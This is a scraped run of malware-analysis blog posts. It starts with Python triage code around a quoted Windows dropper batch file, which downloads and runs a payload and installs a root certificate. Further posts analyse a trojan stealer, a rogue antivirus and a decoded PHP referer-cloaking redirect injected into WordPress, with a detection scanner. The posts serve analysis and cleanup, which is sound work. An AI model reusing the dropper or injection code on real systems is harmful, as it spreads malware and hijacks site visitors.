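SAMPLE_BATCH = r"""
echo 38942489234324hj32b423842h43fndjhs48323jk42 >> %temp%\xhuahushbnnmf.dat.dat
set inf=0
set exe="%temp%\msavc.exe"
if exist %temp%\%USERNAME%.dll goto mapa
> %temp%\%USERNAME%.dll echo y
:mapa
%temp%\givetome.exe http://example.invalid/~placeholder/PAYLOAD.JIP "%exe%"
del "%temp%\leiame.txt"
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer
cmd.exe /c "%exe%"
del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe
echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
"""

# Padding lines of the form 'echo <garbage> >> %temp%\<name>.dat.dat' carry no behaviour.
JUNK_RE = re.compile(r"^echo\s+\S+.*>>?\s*%temp%\\\S+\.dat\.dat\s*$", re.I)
SET_RE = re.compile(r"^set\s+([^=\s]+)=(.*)$", re.I)
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
URL_RE = re.compile(r"https?://\S+", re.I)
CERT_RE = re.compile(r"certutil(?:\.exe)?\s+-addstore\s+(\S+)\s+(\S+)", re.I)
EXEC_RE = re.compile(r'cmd(?:\.exe)?\s+/c\s+"?([^"\s]+)', re.I)
DEL_RE = re.compile(r'^del\s+(?:/F\s+)?"?([^"\s]+)', re.I)
MARKER_RE = re.compile(r"^>\s*(\S+)\s+echo\b", re.I)


def strip_junk(script):
    """Return the non-empty lines that are not padding."""
    lines = [ln.strip() for ln in script.splitlines()]
    return [ln for ln in lines if ln and not JUNK_RE.match(ln)]


def expand_vars(line, env):
    """Substitute %name% only for variables the script itself defined with 'set'."""
    return VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), line)


def triage(script):
    """Summarise what the batch file does, in the order the post describes it."""
    env = {}
    report = {"downloads": [], "cert_installs": [], "executions": [],
              "deleted": [], "marker_files": []}
    for line in strip_junk(script):
        m = SET_RE.match(line)
        if m:  # remember 'set exe="..."' so a later "%exe%" can be resolved
            env[m.group(1).lower()] = m.group(2).strip().strip('"')
            continue
        line = expand_vars(line, env)
        urls = URL_RE.findall(line)
        if urls:  # downloader invocation: <tool> <url> "<destination>"
            tokens = line.split()
            save_as = tokens[-1].strip('"') if tokens[-1] != urls[0] else None
            report["downloads"].append({"url": urls[0], "save_as": save_as})
        m = CERT_RE.search(line)
        if m:
            report["cert_installs"].append({"store": m.group(1), "cert": m.group(2)})
        m = EXEC_RE.search(line)
        if m:
            report["executions"].append(m.group(1))
        m = DEL_RE.match(line)
        if m:
            report["deleted"].append(m.group(1))
        m = MARKER_RE.match(line)
        if m:  # '> file echo y' creates an infection-marker file
            report["marker_files"].append(m.group(1))
    return report


def is_dropper_pattern(report):
    """True when a downloaded file is later executed and a cert was pushed to the root store."""
    dropped = {d["save_as"].lower() for d in report["downloads"] if d["save_as"]}
    runs_dropped = any(x.lower() in dropped for x in report["executions"])
    touches_root = any(c["store"].lower() == "root" for c in report["cert_installs"])
    return runs_dropped and touches_root
```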
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Now we need to take a look at the newly downloaded PE file (MD5 B99A6FF84E4404488D789F5D56593735), named 'msavc.exe'. This file is packed with UPX 3.08 and written in Borland Delphi.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Based on the VirusTotal result, the PE file is probably a trojan stealer, password stealer or banking trojan, i.e. malware that steals user information from victim PCs.</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://www.virustotal.com/file/7802350f5052b8e5d8e13eda728ee28586b94b09fca05bd8f0e3abe0b6e49b1f/analysis/1344927303/">https://www.virustotal.com/file/7802350f5052b8e5d8e13eda728ee28586b94b09fca05bd8f0e3abe0b6e49b1f/analysis/1344927303/</a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFp_yaBgQydekty1oEPom1f7jG76h4relBhDYklSY5zDS_U_VFNIUXDSw0v3Tr7TpLOw_imvqCRRwPAciMvZncP8wQJDZyb9cGvcmnN7vRbKZlhV-9hBJUN9ioIXgeveP3ziIj1l9BIOA/s1600/cap1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFp_yaBgQydekty1oEPom1f7jG76h4relBhDYklSY5zDS_U_VFNIUXDSw0v3Tr7TpLOw_imvqCRRwPAciMvZncP8wQJDZyb9cGvcmnN7vRbKZlhV-9hBJUN9ioIXgeveP3ziIj1l9BIOA/s400/cap1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
As we can see in the network traffic, it tries to access the following URL with a parameter appended:</div>
hxxp://www.snv1r1.net/2k12v3r1/71164BED09340ABE6D4C69BD.php?op=7A0B4EED571641ED7E277EBE704E09DA3C5D3E<br />
<div>
<br /></div>
<div>
The domain name is still active, but the content at the given URL is no longer available.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijnHJusTDF02Y5C8l4zC5rhsEq5AJnG7FIdp2NtXL74hCSPa5BDMAwTzB1wq76MEpzLH3gQHlA66jyPBVqE-VtO5Z6HNRVFsiJWNtemRLO_bac9EVmMu5kq3PRllIvoFmEsmX4SB_GrMA/s1600/mutex1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijnHJusTDF02Y5C8l4zC5rhsEq5AJnG7FIdp2NtXL74hCSPa5BDMAwTzB1wq76MEpzLH3gQHlA66jyPBVqE-VtO5Z6HNRVFsiJWNtemRLO_bac9EVmMu5kq3PRllIvoFmEsmX4SB_GrMA/s400/mutex1.png" width="400" /></a></div>
<div>
<br /></div>
<div>
The malware also creates several mutexes and crawls through several sensitive directories.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Gjbfh1toiRhy0XuJ7ikKif_fk81Evp5nvx4QR7F5BH9SuAUG-KI7-HjFZS1QMrj3NMH7DfwCoG7ZRgCYF_s-wcOLzR34YDM52N7xSdY8RNuKqjzGuh0oHnHlVRh2BPcKP18RB1XxKes/s1600/crawl1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Gjbfh1toiRhy0XuJ7ikKif_fk81Evp5nvx4QR7F5BH9SuAUG-KI7-HjFZS1QMrj3NMH7DfwCoG7ZRgCYF_s-wcOLzR34YDM52N7xSdY8RNuKqjzGuh0oHnHlVRh2BPcKP18RB1XxKes/s400/crawl1.png" width="400" /></a></div>
<div>
<br /></div>
<div>
It also modifies many places in the Windows registry to lower security settings and read the Internet settings.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Online sandbox results:<br />
1. <a href="https://www.virustotal.com/file/d15d650d4bf08626af7a4e5322c967fb0e3ca23805d9da6904f5f8ee88f0c55b/analysis/">https://www.virustotal.com/file/d15d650d4bf08626af7a4e5322c967fb0e3ca23805d9da6904f5f8ee88f0c55b/analysis/</a><br />
2. <a href="http://malwr.com/analysis/a1d2a281980fdd75546557a9ba6de0a6/">http://malwr.com/analysis/a1d2a281980fdd75546557a9ba6de0a6/</a></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-65025268165307466112012-08-13T20:33:00.002+08:002012-08-13T23:06:00.120+08:00Live Security Platinum (Rogue AV)<div style="text-align: justify;">
A couple of weeks ago I received a rogue AV sample disguised as 'Live Security Platinum', although this malware was already discovered by others a few months ago. Once this malware is installed, every executable file is marked as 'infected', and none of your files can be executed until you purchase their 'security' antivirus program. Let's take a look at a basic dynamic analysis here. In this write-up I'm not covering removal from your system in detail.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The malware I received came from a compromised website embedded with a Java object that requires users to allow their browser to execute the .jar file. This .jar file then downloads the .exe installer of the 'Live Security Platinum' malware.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdvfANkXTYbPs_nqyvX5JfblDbvWeIwKF6WvOJgNEgKMN4ZY496AQYWt7UClQILdCkVSFc88GS3vGKXOo5XQfe3jyM6EwwJRMp5xB4SacjZox9TclccRd0SmCv-UNdrxCBj6BJS2E__ks/s1600/lsp2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdvfANkXTYbPs_nqyvX5JfblDbvWeIwKF6WvOJgNEgKMN4ZY496AQYWt7UClQILdCkVSFc88GS3vGKXOo5XQfe3jyM6EwwJRMp5xB4SacjZox9TclccRd0SmCv-UNdrxCBj6BJS2E__ks/s400/lsp2.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
The snapshot above shows the first run of the malware, which checks for the latest update, downloads it and installs. The install path is under the user's program data directory. See the image below.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWIa85BiDrGM3mHY1ortBql20DH9qh8om2TU0kmfbYLPaEv-eSGLjiivQGL6jZoo_lKwSAAJIjeYPQJhNo2Ksc66JK2QHnZmE19HEKdcf8l6_u0ZhLX0B8xcEfA75hyphenhyphen1ABajM8F6BVFpU/s1600/lsp11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWIa85BiDrGM3mHY1ortBql20DH9qh8om2TU0kmfbYLPaEv-eSGLjiivQGL6jZoo_lKwSAAJIjeYPQJhNo2Ksc66JK2QHnZmE19HEKdcf8l6_u0ZhLX0B8xcEfA75hyphenhyphen1ABajM8F6BVFpU/s400/lsp11.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxtTw7DRmg0Kb4swhVX_fIAF3cHC0slql4Pd_v-y5pV2YfP36bosz53TmIAyBbt9s1DeV5Cmhxaq9bMaJrIW1ggA5tc9kuaSJt_uTY8bEEovMKrG5Yv8OXB_w7xu2etj28ANJ3o9phRpU/s1600/lsp3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxtTw7DRmg0Kb4swhVX_fIAF3cHC0slql4Pd_v-y5pV2YfP36bosz53TmIAyBbt9s1DeV5Cmhxaq9bMaJrIW1ggA5tc9kuaSJt_uTY8bEEovMKrG5Yv8OXB_w7xu2etj28ANJ3o9phRpU/s400/lsp3.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
After the installation finishes it automatically runs a fake 'scan'. At this point none of your applications can be executed; they are all blocked by the malware.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6e7YwfHxnqnPtGwXRZwuG6i1kBF_PDqPZ4hOdD2zXgkFuBGLKJf4Rwv5wTs2BThnD7kzwoNwT6_8ef4NSbKByJ_j8Qoe8ZKQnMTjxrRIonijbvG7d3LgHseLHugM2yRo4BEZrMv9HrS4/s1600/lsp4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6e7YwfHxnqnPtGwXRZwuG6i1kBF_PDqPZ4hOdD2zXgkFuBGLKJf4Rwv5wTs2BThnD7kzwoNwT6_8ef4NSbKByJ_j8Qoe8ZKQnMTjxrRIonijbvG7d3LgHseLHugM2yRo4BEZrMv9HrS4/s400/lsp4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
If you try to run any application on your computer, you get a fake notification saying that your computer has been infected by 'malware'.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxWWRWdQEYqWUUaQwQWhl_5QahImwhw9dWVaURrMwq1GMAzGayb67bplXAiFZS-hnh8sb-8K352Xe0jCaAE-kUG3BWD2_3NXPmzgi0hCbwtky_t-jRL73F-tGMA76eILKdc8g8QqHiSJk/s1600/lsp5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxWWRWdQEYqWUUaQwQWhl_5QahImwhw9dWVaURrMwq1GMAzGayb67bplXAiFZS-hnh8sb-8K352Xe0jCaAE-kUG3BWD2_3NXPmzgi0hCbwtky_t-jRL73F-tGMA76eILKdc8g8QqHiSJk/s400/lsp5.png" width="400" /></a></div>
<br />
It keeps reminding you to update and purchase their 'software'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOEGSG-lfi5IBlYXtfr4ltPy3rFYJmzNm_cHz5y15Q9kbhonrHbJSViwPx_BPNhe-SH8VGqOzw89LzKtb0UmIhxSlAs2vq0XKdnlPW4BhGSKyreYblGnyQieqfAR0mKdg_4WSzjP51gpQ/s1600/lsp6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOEGSG-lfi5IBlYXtfr4ltPy3rFYJmzNm_cHz5y15Q9kbhonrHbJSViwPx_BPNhe-SH8VGqOzw89LzKtb0UmIhxSlAs2vq0XKdnlPW4BhGSKyreYblGnyQieqfAR0mKdg_4WSzjP51gpQ/s400/lsp6.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Let's give it a try by entering a valid serial number into the malware's registration form. The key I entered is AA39754E-715219CE. This key is already circulating on the internet, so I just used it to make removing the infection easier.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqaX5vuBwehq6vP-AE7G4xBvH7o915djoo7ENt64d9RtCURSgCnJhCiEJiEiaHt62iBydQZd-GTPa0ynPZ1qU8gwQozmTXgEjP3_JJS46hDFK7cZOs-oc_aIv9upn102J8M3zQ7JC1zv0/s1600/lsp7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqaX5vuBwehq6vP-AE7G4xBvH7o915djoo7ENt64d9RtCURSgCnJhCiEJiEiaHt62iBydQZd-GTPa0ynPZ1qU8gwQozmTXgEjP3_JJS46hDFK7cZOs-oc_aIv9upn102J8M3zQ7JC1zv0/s400/lsp7.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Once you click the 'Activate' button you are told that you have successfully registered their 'product'. All your applications can now run normally. You will notice that the rogue AV window has changed to a light blue colour and there is an extra shortcut icon on your desktop. It is a URL shortcut to the malware website.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQPJD3Hm6ioTniEByvxWVKWSwMRKUnP6qUs6wPJ5zlL1IW3jK7H8bXWJvL-nQlZmUR4knwY528BoGHwHn0xJ1gOMBPbkqTtAP9MyQPHwMpPTQ6y_7_ISM-a-RM-rK5aN9pvqbWAnBjDi4/s1600/lsp9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQPJD3Hm6ioTniEByvxWVKWSwMRKUnP6qUs6wPJ5zlL1IW3jK7H8bXWJvL-nQlZmUR4knwY528BoGHwHn0xJ1gOMBPbkqTtAP9MyQPHwMpPTQ6y_7_ISM-a-RM-rK5aN9pvqbWAnBjDi4/s400/lsp9.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
If we open the URL we see an online user guide for users to read. As of now the website is still accessible.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZfjApMg6vUG-gOcBb2jMLTV9Kkt_lcE7kMSFYIcHlJpiAc4SFmjX8k7gZGkS3uiLESXEyZbtIM39yzPNQNvS5-eO6-x99cKxYqwwMqO0Tjxgy8H-eg-6nl0A4LDic94MlIm9oadBGR5g/s1600/lsp10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZfjApMg6vUG-gOcBb2jMLTV9Kkt_lcE7kMSFYIcHlJpiAc4SFmjX8k7gZGkS3uiLESXEyZbtIM39yzPNQNvS5-eO6-x99cKxYqwwMqO0Tjxgy8H-eg-6nl0A4LDic94MlIm9oadBGR5g/s400/lsp10.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
For removal, Malwarebytes Anti-Malware is enough to clean up the whole infection.</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-61836800501966327342012-05-26T01:51:00.000+08:002012-08-09T11:13:15.509+08:00Parasite PHP script on victim website (minkof.sellclassics.com)While helping a victim website remove a phishing site and patch up, I found interesting malicious code inside the WordPress-based website. The case began when the victim site was found hosting a phishing site. The phishing pages, disguised as CIMB Bank, were found in several directories. While updating to the new WordPress version and all the plugins, I noticed something wrong with the size of the index.php files. I had also installed the SIG (Silent Is Golden) plugin to hide directory listings; it installs an empty index.php file in each directory.<br />
<br />
After finishing all the basic patches, I noticed the 'empty' index.php file was not empty. Opening it up, I found this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf7MzBoJOp7SWDLtigCfteK9lDVIa7ZGQK8ZIHnn1i32tSzBEkwYYUkofH6DkLcWOAbVCKmxt0AttPKPl8InnmpR7ZJVHlv3rfnevVhwTBCUMRUVdYtV0eqoEPl8HVxi02pnU1OBjBdKs/s1600/php1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf7MzBoJOp7SWDLtigCfteK9lDVIa7ZGQK8ZIHnn1i32tSzBEkwYYUkofH6DkLcWOAbVCKmxt0AttPKPl8InnmpR7ZJVHlv3rfnevVhwTBCUMRUVdYtV0eqoEPl8HVxi02pnU1OBjBdKs/s400/php1.png" width="400" /></a></div>
<br />
This is definitely not good. Let's decode the base64-encoded eval() part and see what we get.<br />
<pre class="php">error_reporting(0);            // hide PHP errors so the injection stays quiet
$qazplm=headers_sent();
if (!$qazplm){                 // only act while header() can still redirect
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0")){   // never fires for Internet Explorer 7
            // visitors arriving from search engines, URL shorteners or social sites...
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo")
                or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta")
                or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer)
                or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
                // ...unless the referer looks like a cached copy or an inurl: search
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://minkof.sellclassics.com/");   // send them to the parasite site
                    exit();
                }
            }
        }
    }
}</pre>
<br />
The decoded code above shows that any visitor whose referer matches one of the listed search engines, URL shorteners or social sites is redirected to 'minkof.sellclassics.com'. The script is set not to run for IE7 visitors. The suspicious file doing this infection comes from the WordPress plugins script, '/wp-admin/plugins.php'. Let's take a look.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-NB28OxUFN3etCNl7DViQuccxUzxuRV3u6ggvNlMjGx6pDiBmKlYgAWu249Qf4-4daF2FDNfNjPXkmgAsXxSXQMQi6Qezj7bk8qYBZmUVtn7wxUB0clkcsN68hAolcneDDXUCv5yZm0g/s1600/php2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-NB28OxUFN3etCNl7DViQuccxUzxuRV3u6ggvNlMjGx6pDiBmKlYgAWu249Qf4-4daF2FDNfNjPXkmgAsXxSXQMQi6Qezj7bk8qYBZmUVtn7wxUB0clkcsN68hAolcneDDXUCv5yZm0g/s400/php2.png" width="400" /></a></div>
<br />
Well, just what I expected. There is an injected script at the beginning of the file, and at the bottom of the file there is a huge base64-encoded string passed to eval(). After some decoding it seems all the encoded scripts are the same, inserted at random places within plugins.php. This causes plugins.php to generate many errors.<br />
<br />
Since the infection had hit all .php files with the same script, I decided to replace all WordPress files with fresh copies. After that, some infected scripts were still left, especially in their custom theme. A special script is needed to crawl and find all the infected files. Thanks to @Xanda.org for writing a nice PHP script to detect PHP web shells, which can also be used in this case. After running the script I found more than 100 PHP files still infected. I removed some unused plugins and themes, and some files had to be fixed manually.<br />
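As an added example covering both the decoding step above and the crawl for still-infected files (my own code, not the post's or @Xanda.org's script), the following Python scanner finds `eval(base64_decode('...'))` in PHP source, decodes the payload and classifies it by the referer-cloaking pattern shown in the decoded script: referer keyword list, IE7 exclusion and the `header("Location: ...")` redirect. The sample index.php is constructed; its payload is the decoded script from the post, shortened, with a placeholder redirect host.

```python
import base64
import binascii
import re

# Constructed sample payload: the decoded script from the post, shortened,
# with a placeholder redirect host in place of the real one.
INJECTED_PAYLOAD = r'''error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or preg_match("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://redirect.example.invalid/");
exit();
}}}}}'''

# Constructed 'infected' index.php: the payload wrapped in eval(base64_decode()),
# as found in the post, followed by the plugin's own empty-index stub.
SAMPLE_INDEX_PHP = (
    "<?php\n"
    "eval(base64_decode('"
    + base64.b64encode(INJECTED_PAYLOAD.encode()).decode()
    + "'));\n"
    "// Silence is golden.\n"
)
CLEAN_INDEX_PHP = "<?php\n// Silence is golden.\n"

EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)""", re.I)
REDIRECT_RE = re.compile(r"""header\s*\(\s*['"]Location:\s*([^'"]+)['"]""", re.I)
REFERER_KW_RE = re.compile(r'(?<!!)stristr\(\$referer,"([^"]+)"\)')   # positive matches
REFERER_NEG_RE = re.compile(r'!stristr\(\$referer,"([^"]+)"\)')       # negated matches
REFERER_PREG_RE = re.compile(r'preg_match\s*\(\s*"([^"]+)"\s*,\s*\$referer')
UA_SKIP_RE = re.compile(r'!stristr\(\$uag,"([^"]+)"\)')


def decode_eval_blobs(php_source):
    """Yield (line_number, decoded_php) for each eval(base64_decode('...')) found."""
    for m in EVAL_B64_RE.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = ""  # not valid base64; the eval() itself is still worth reporting
        line = php_source.count("\n", 0, m.start()) + 1
        yield line, decoded


def classify_payload(decoded):
    """Pull out the cloaking logic: who gets redirected, where, and who is skipped."""
    redirect = REDIRECT_RE.search(decoded)
    info = {
        "reads_referer": "HTTP_REFERER" in decoded,
        "redirect_to": redirect.group(1).strip() if redirect else None,
        "referer_keywords": REFERER_KW_RE.findall(decoded),
        "referer_patterns": REFERER_PREG_RE.findall(decoded),
        "referer_exclusions": REFERER_NEG_RE.findall(decoded),
        "skips_user_agent": UA_SKIP_RE.findall(decoded),
        "suppresses_errors": "error_reporting(0)" in decoded,
    }
    if info["reads_referer"] and info["redirect_to"]:
        info["verdict"] = "referer-cloaking-redirect"
    elif decoded:
        info["verdict"] = "obfuscated-eval"
    else:
        info["verdict"] = "undecodable-eval"
    return info


def scan_php(php_source):
    """Return one finding per obfuscated eval() in the given PHP source text."""
    findings = []
    for line, decoded in decode_eval_blobs(php_source):
        finding = {"line": line}
        finding.update(classify_payload(decoded))
        findings.append(finding)
    return findings
```

To crawl a whole site, feed each .php file's contents to scan_php() and list the files with a non-empty result.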
<br />
The domain name 'minkof.sellclassics.com' seems to be down already. I can't go further with the analysis, but others have already analysed what happened. As I noticed, it affects not only WordPress but also other popular CMSs like Joomla, Drupal and so on.<br />
<br />
http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html<br />
http://productforums.google.com/forum/#!topic/webmasters/SuUGJWwbqeAUnknownnoreply@blogger.com2tag:blogger.com,1999:blog-2797284762054001698.post-80103030647082101512012-05-17T07:11:00.000+08:002012-08-09T11:13:58.970+08:00CyberSecurity Malaysia launches its own DNSChanger detection pageCSM has just released another free service for checking for the DNSChanger trojan. By simply visiting the following website you will be told whether your current PC/notebook is infected with the DNSChanger malware or not.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt0cvQYH-ivbKxqMGuTZcuFNWLJTRpj0nTRfjEXJOvLe8JMQ8eexUArI5j-65SnjzI1Tm3HEoz7n0EtLBPtK8C75XqTjMMA1uOfCLT-AYkChfQmqp9hYpkXjjxdaz8X01B33dE_aKY8vM/s1600/detec1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt0cvQYH-ivbKxqMGuTZcuFNWLJTRpj0nTRfjEXJOvLe8JMQ8eexUArI5j-65SnjzI1Tm3HEoz7n0EtLBPtK8C75XqTjMMA1uOfCLT-AYkChfQmqp9hYpkXjjxdaz8X01B33dE_aKY8vM/s400/detec1.png" width="400" /></a></div>
<br />
<br />
<br />
<a href="http://dnschanger.detect.my/" target="_blank">http://dnschanger.detect.my/</a><br />
<br />
If your PC is clean you will see 'Congratulation!' on a green background; otherwise you will get a red background. They also provide free removal tools for Mac and Windows users.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-37433153566143839972012-05-03T09:08:00.000+08:002012-08-09T11:14:56.909+08:00Windows 8 Forensics GuideJust reading and sharing something before I go to sleep. It is a basic introduction to the next generation of Windows, called Windows 8. Pretty good for advanced users who want to know a little more 'in-depth' how the Windows folders, registry, users and system variables, and so on work and where they are located. For malware analysts it is probably good to know for future malware infection cases.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzcfY9OS_2V8Yo5jOxx1o_wZM7BgmpDJJf9ySuGtRk51IdbIRuM0Ysx3__VDVUk8YMb-8ToeZxAwEuOWgKHSgUr0C1PFKh2hjRaravDBFZZs9yxuDqKx_1zBHv6NYIfTBeVMm5RppUSpg/s1600/forensic-analysis.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzcfY9OS_2V8Yo5jOxx1o_wZM7BgmpDJJf9ySuGtRk51IdbIRuM0Ysx3__VDVUk8YMb-8ToeZxAwEuOWgKHSgUr0C1PFKh2hjRaravDBFZZs9yxuDqKx_1zBHv6NYIfTBeVMm5RppUSpg/s400/forensic-analysis.jpg" width="400" /></a></div>
<br />
<a href="http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf">http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-23225681098155890752012-04-13T02:39:00.000+08:002012-08-09T11:41:28.186+08:00Antap v1.0a - Get Your Youtube Link<center>
</center>
<div class="separator" style="clear: both; text-align: center;">
